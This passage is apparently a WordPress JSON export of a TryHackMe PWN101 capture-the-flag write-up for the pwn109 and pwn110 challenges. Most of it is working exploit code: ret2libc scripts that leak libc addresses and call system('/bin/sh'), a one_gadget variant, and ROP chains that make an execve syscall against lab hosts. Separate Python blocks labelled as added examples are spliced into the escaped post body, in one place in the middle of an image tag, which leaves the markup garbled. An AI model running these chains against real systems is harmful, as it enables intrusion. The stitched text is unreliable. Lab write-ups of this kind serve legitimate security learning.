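    """puts() emits each pointer as 6 bytes (the top two bytes of a user-space address are 0
    and terminate the string) followed by a newline; consume that newline before the next value."""
    vals, pos = [], 0
    for _ in range(n):
        if stream[pos + 6:pos + 7] != b'\n':
            raise ValueError('expected newline after leak %d' % len(vals))
        vals.append(struct.unpack('<Q', stream[pos:pos + 6].ljust(8, b'\0'))[0])
        pos += 7
    return vals


def libc_base(puts_leak, gets_leak, setvbuf_leak, syms=LIBC_SYMS):
    """Base from puts; gets and setvbuf must land on their symbols in the same libc, otherwise
    the build chosen from the leaks is wrong and system()/"/bin/sh" will be off."""
    base = puts_leak - syms['puts']
    if base & 0xFFF:
        raise ValueError('libc base not page aligned: %#x' % base)
    for name, leak in (('gets', gets_leak), ('setvbuf', setvbuf_leak)):
        if leak - base != syms[name]:
            raise ValueError('%s does not match this libc build' % name)
    return base


def stage2_chain(base, syms=LIBC_SYMS):
    """ret2libc: the extra RET keeps rsp 16-byte aligned at the call into system()."""
    return (b'a' * OFFSET + p64(RET) + p64(POP_RDI_RET)
            + p64(base + syms['bin_sh']) + p64(base + syms['system']))


# Constructed output of stage 1 (made-up page-aligned base), byte for byte as it arrives.
_BASE = 0x7F2B1C000000
SAMPLE_STREAM = b''.join(p64(_BASE + LIBC_SYMS[s])[:6] + b'\n' for s in ('puts', 'gets', 'setvbuf'))


def run(stream=SAMPLE_STREAM):
    puts_leak, gets_leak, setvbuf_leak = read_leaks(stream)
    base = libc_base(puts_leak, gets_leak, setvbuf_leak)
    return base, stage2_chain(base)
```

<p>naive_leaks() on the same stream returns the puts pointer correctly and garbage for gets and setvbuf (a newline followed by five bytes of the next pointer), which is why the leaks have to be read as 6 bytes plus newline.<\/p>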
&lt;+51&gt;:    mov    eax,0x0\n   0x000000000040122a &lt;+56&gt;:    call   0x401070 &lt;gets@plt&gt;\n   0x000000000040122f &lt;+61&gt;:    nop\n   0x0000000000401230 &lt;+62&gt;:    leave\n   0x0000000000401231 &lt;+63&gt;:    ret\nEnd of assembler dump.<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Payload<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">from pwn import *\n#io=process('.\/pwn109-1644300507645.pwn109')\nlibc = ELF('.\/libc6_2.31-0ubuntu9.10_amd64.so')  # the build libc.rip matched from the three leaks\n#elf=ELF('.\/pwn109-1644300507645.pwn109')\n#libc=elf.libc\nio=remote('10.48.149.194',9009)\npop_rdi_ret=0x004012a3\noffset=40  # 0x20 buffer + saved rbp\nputs_plt=0x0000000000401060\nputs_got=0x404018\ngets_got=0x404020\nsetvbuf_got=0x404028\nmain=0x4011f2\nret=0x0040101a  # lone ret gadget, realigns the stack before system()\n\nio.recvlines(6)\n\n# stage 1: puts(puts@got), puts(gets@got), puts(setvbuf@got), then back into main\nio.sendline(b'a'*offset+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(pop_rdi_ret)+p64(gets_got)+p64(puts_plt)+p64(pop_rdi_ret)+p64(setvbuf_got)+p64(puts_plt)+p64(main))\n\n# puts prints each 6-byte pointer followed by a newline; consume the newline, otherwise the\n# next recv(6) returns the newline plus only 5 bytes of the following pointer\nputs_libc = u64(io.recvn(6) + b'\\x00\\x00')\nio.recvn(1)\nlog.info(f'puts_libc: {hex(puts_libc)}')\n\ngets_libc=u64(io.recvn(6) + b'\\x00\\x00')\nio.recvn(1)\nlog.info(f'gets_libc: {hex(gets_libc)}')\n\nsetvbuf_libc=u64(io.recvn(6) + b'\\x00\\x00')\nio.recvn(1)\nlog.info(f'setvbuf_libc: {hex(setvbuf_libc)}')\n\nlibc_base=puts_libc - libc.symbols['puts']\nlog.info(f'libc_base: {hex(libc_base)}')\n\nsystem_addr = libc_base + libc.symbols['system']\nbin_sh_addr = libc_base + next(libc.search(b'\/bin\/sh'))\n\n# stage 2: ret2libc through the second gets() in main\nio.sendline(b'a'*offset+p64(ret)+p64(pop_rdi_ret)+p64(bin_sh_addr)+p64(system_addr))\nio.interactive()<\/code><\/pre>\n\n\n\n<p>with one_gadget<\/p>\n\n\n\n<p>Too lazy to chain ROP: let one_gadget list the candidate offsets in the identified libc and try them one after another until one spawns a shell (each candidate has register or stack constraints that may or may not hold at the point of return).<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">from pwn import *\n#io=process('.\/pwn109-1644300507645.pwn109')\nlibc = 
ELF('.\/libc6_2.31-0ubuntu9.10_amd64.so')\nelf=ELF('.\/pwn109-1644300507645.pwn109')\nrop=ROP(elf)\nio=remote('10.49.179.119',9009)\n\noffset=40\n\nputs_plt=elf.plt['puts']\nputs_got=elf.got['puts']\ngets_got=elf.got['gets']\nsetvbuf_got=elf.got['setvbuf']\nmain=elf.symbols['main']\npop_rdi_ret = rop.find_gadget(['pop rdi','ret'])[0]\nret = rop.find_gadget(['ret'])[0]\n\nio.recvlines(6)\n\nio.sendline(b'a'*offset+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(pop_rdi_ret)+p64(gets_got)+p64(puts_plt)+p64(pop_rdi_ret)+p64(setvbuf_got)+p64(puts_plt)+p64(main))\n\n# each leak is 6 bytes followed by a newline; consume the newline between leaks\nputs_leak=u64(io.recvn(6).ljust(8,b'\\x00'))\nio.recvn(1)\nlog.info(f'puts_leak : {hex(puts_leak)}')\n\ngets_leak=u64(io.recvn(6).ljust(8,b'\\x00'))\nio.recvn(1)\nlog.info(f'gets_leak : {hex(gets_leak)}')\n\nsetvbuf_leak=u64(io.recvn(6).ljust(8,b'\\x00'))\nio.recvn(1)\nlog.info(f'setvbuf_leak : {hex(setvbuf_leak)}')\n\nlibc_base=puts_leak - libc.symbols['puts']\nlog.info(f'libc_base : {hex(libc_base)}')\n\nshell=libc_base+0xe3b01  # one_gadget candidate for this libc build, picked by trial\nio.sendline(b'a'*offset+p64(shell))\nio.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">pwn 110 &#8211; Playing with ROP<\/h2>\n\n\n\n<p>cyclic together with pwndbg gives an offset of 0x28 to the return address. Every gadget in the chain lives in the binary itself (addresses in the 0x40xxxx to 0x4cxxxx range, no libc needed), collected from the gadget search shown in the picture below; the chain writes \/bin\/sh into .data and makes the execve syscall directly.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"130\" src=\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/03\/image-1024x130.png\" alt=\"\" class=\"wp-image-729\" srcset=\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/03\/image-1024x130.png 1024w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/03\/image-300x38.png 300w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/03\/image-768x98.png 768w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/03\/image-1536x195.png 1536w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/03\/image.png 1897w\" sizes=\"auto, (max-width: 1024px) 
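<p>A chain like the one this section builds is easy to get subtly wrong (a pop consumed out of order, a store to the wrong register, a gadget address containing 0x0a that gets() treats as end of line). The following added example builds the page's execve chain and steps through it with a tiny interpreter that applies each gadget's effect to a register file and a sparse memory, stopping at the syscall gadget and returning what the kernel would see. It is not the page's code; the gadget addresses and the .data slot are the page's, and the semantics of 0x4340a3 (store rdx at [rdi]; ret) are assumed from how the chain uses it rather than from disassembling the binary.<\/p>

```python
import struct


def p64(v):
    return struct.pack('<Q', v)


# Gadget addresses from the page's payload (static, non-PIE binary, so fixed).
POP_RDI, POP_RAX, POP_RSI, POP_RDX = 0x40191A, 0x4497D7, 0x40F4DE, 0x40181F
STORE_RDX_AT_RDI = 0x4340A3   # assumed from its use in the chain: mov qword ptr [rdi], rdx ; ret
SYSCALL = 0x4012D3
DATA = 0x4C00E0               # writable .data slot that receives "/bin/sh\0"
OFFSET = 0x28
SYS_EXECVE = 59


def execve_chain():
    """The page's chain: park '/bin/sh\\0' in rdx, store it at DATA, then execve(DATA, 0, 0)."""
    return (b'a' * OFFSET
            + p64(POP_RDX) + b'/bin/sh\0'
            + p64(POP_RDI) + p64(DATA)
            + p64(STORE_RDX_AT_RDI)
            + p64(POP_RSI) + p64(0)
            + p64(POP_RDX) + p64(0)
            + p64(POP_RAX) + p64(SYS_EXECVE)
            + p64(SYSCALL))


def gets_safe(payload):
    """gets() stops at the first 0x0a, so no gadget address or constant may contain one."""
    return b'\n' not in payload


def pop_into(reg):
    def gadget(regs, pop, write8):   # pop <reg> ; ret
        regs[reg] = pop()
    return gadget


def store_rdx_at_rdi(regs, pop, write8):   # mov qword ptr [rdi], rdx ; ret
    write8(regs['rdi'], regs['rdx'])


GADGETS = {POP_RDI: pop_into('rdi'), POP_RAX: pop_into('rax'), POP_RSI: pop_into('rsi'),
           POP_RDX: pop_into('rdx'), STORE_RDX_AT_RDI: store_rdx_at_rdi}


def run_chain(payload, offset=OFFSET):
    """Step through the chain the way ret would: the first 8 bytes after the filler replace the
    saved return address, each gadget pops what it needs, and execution stops at the syscall
    gadget. Returns the register file and the C string at rdi, i.e. what the kernel would see."""
    regs = {'rax': 0, 'rdi': 0, 'rsi': 0, 'rdx': 0}
    mem = {}                     # sparse memory: address -> byte value
    rsp = offset

    def pop():
        nonlocal rsp
        value = struct.unpack_from('<Q', payload, rsp)[0]
        rsp += 8
        return value

    def write8(addr, value):
        for i, byte in enumerate(p64(value)):
            mem[addr + i] = byte

    def cstring(addr):
        out = bytearray()
        while mem.get(addr + len(out), 0):
            out.append(mem[addr + len(out)])
        return bytes(out)

    while True:
        rip = pop()
        if rip == SYSCALL:
            return regs, cstring(regs['rdi'])
        if rip not in GADGETS:
            raise ValueError('chain returned into an unknown address %#x' % rip)
        GADGETS[rip](regs, pop, write8)
```

<p>run_chain(execve_chain()) ends at the syscall with rax = 59, rdi pointing at a NUL-terminated \/bin\/sh in .data and rsi = rdx = 0, and gets_safe() confirms no byte of the chain would stop gets() early.<\/p>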
100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Payload<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">from pwn import *\nr=remote('10.10.162.17',9010)\n\npop_rdi=0x40191a\npop_rax=0x4497d7\npop_rsi=0x40f4de\npop_rdx=0x40181f\ndata_addr=0x4c00e0\nmov_rdx_to_rdi=0x4340a3\nsyscall_addr=0x4012d3\n\nr.sendline(b'a'*0x28+p64(pop_rdx)+b'\/bin\/sh\\x00'+p64(pop_rdi)+p64(data_addr)+p64(mov_rdx_to_rdi)+p64(pop_rsi)+p64(0)+p64(pop_rdx)+p64(0)+p64(pop_rax)+p64(59)+p64(syscall_addr))\n\nr.interactive()<\/code><\/pre>\n\n\n\n<p>script kiddie version<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">from pwn import *\nfrom struct import pack\n\nio=process('.\/pwn110-1644300525386.pwn110')\n\np = b''\n\np += pack('&lt;Q', 0x000000000040f4de) # pop rsi ; ret\np += pack('&lt;Q', 0x00000000004c00e0) # @ .data\np += pack('&lt;Q', 0x00000000004497d7) # pop rax ; ret\np += b'\/bin\/\/sh'\np += pack('&lt;Q', 0x000000000047bcf5) # mov qword ptr [rsi], rax ; ret\np += pack('&lt;Q', 0x000000000040f4de) # pop rsi ; ret\np += pack('&lt;Q', 0x00000000004c00e8) # @ .data + 8\np += pack('&lt;Q', 0x0000000000443e30) # xor rax, rax ; ret\np += pack('&lt;Q', 0x000000000047bcf5) # mov qword ptr [rsi], rax ; ret\np += pack('&lt;Q', 0x000000000040191a) # pop rdi ; ret\np += pack('&lt;Q', 0x00000000004c00e0) # @ .data\np += pack('&lt;Q', 0x000000000040f4de) # pop rsi ; ret\np += pack('&lt;Q', 0x00000000004c00e8) # @ .data + 8\np += pack('&lt;Q', 0x000000000040181f) # pop rdx ; ret\np += pack('&lt;Q', 0x00000000004c00e8) # @ .data + 8\np += pack('&lt;Q', 0x0000000000443e30) # xor rax, rax ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 
0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += 
pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x00000000004012d3) # syscall\n\nio.sendline(b'a'*0x28+p)\nio.interactive()<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>pwn 101 &#8211; Buff 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","categories":[1],"tags":[],"class_list":["post-708","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>TryHackMe PWN101 - my article<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/\" \/>\n<meta property=\"og:locale\" content=\"zh_TW\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"TryHackMe PWN101 - my article\" \/>\n<meta property=\"og:description\" content=\"pwn 101 &#8211; Buff [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/\" \/>\n<meta property=\"og:site_name\" content=\"my article\" \/>\n<meta property=\"article:published_time\" content=\"2025-03-19T07:35:00+00:00\" \/>\n<meta property=\"article:modified_time\" 
content=\"2026-03-24T08:39:38+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/03\/image.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1897\" \/>\n\t<meta property=\"og:image:height\" content=\"241\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"chengyunpu\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005:\" \/>\n\t<meta name=\"twitter:data1\" content=\"chengyunpu\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9810\u4f30\u95b1\u8b80\u6642\u9593\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 \u5206\u9418\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/\"},\"author\":{\"name\":\"chengyunpu\",\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/f697887c7eea19b57c04d0a2bb4d9411\"},\"headline\":\"TryHackMe 
PWN101\",\"datePublished\":\"2025-03-19T07:35:00+00:00\",\"dateModified\":\"2026-03-24T08:39:38+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/\"},\"wordCount\":353,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/f697887c7eea19b57c04d0a2bb4d9411\"},\"image\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/03\/image-1024x130.png\",\"inLanguage\":\"zh-TW\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/\",\"url\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/\",\"name\":\"TryHackMe PWN101 - my article\",\"isPartOf\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/03\/image-1024x130.png\",\"datePublished\":\"2025-03-19T07:35:00+00:00\",\"dateModified\":\"2026-03-24T08:39:38+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/#breadcrumb\"},\"inLanguage\":\"zh-TW\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-TW\",\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/#primaryimage\",\"url\":\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/03
\/image.png\",\"contentUrl\":\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/03\/image.png\",\"width\":1897,\"height\":241},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u9996\u9801\",\"item\":\"https:\/\/chengyunpu.com\/wordpress\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"TryHackMe PWN101\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#website\",\"url\":\"https:\/\/chengyunpu.com\/wordpress\/\",\"name\":\"my article\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/f697887c7eea19b57c04d0a2bb4d9411\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/chengyunpu.com\/wordpress\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"zh-TW\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/f697887c7eea19b57c04d0a2bb4d9411\",\"name\":\"chengyunpu\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-TW\",\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/8e26f1a47b73420e32e35b25e19c6abf045eb208b1a34d5d90f5d166505983d2?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/8e26f1a47b73420e32e35b25e19c6abf045eb208b1a34d5d90f5d166505983d2?s=96&d=mm&r=g\",\"caption\":\"chengyunpu\"},\"logo\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/image\/\"},\"sameAs\":[\"http:\/\/chengyunpu.com\/wordpress\"],\"url\":\"https:\/\/chengyunpu.com\/wordpress\/author\/chengyunpu\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->"}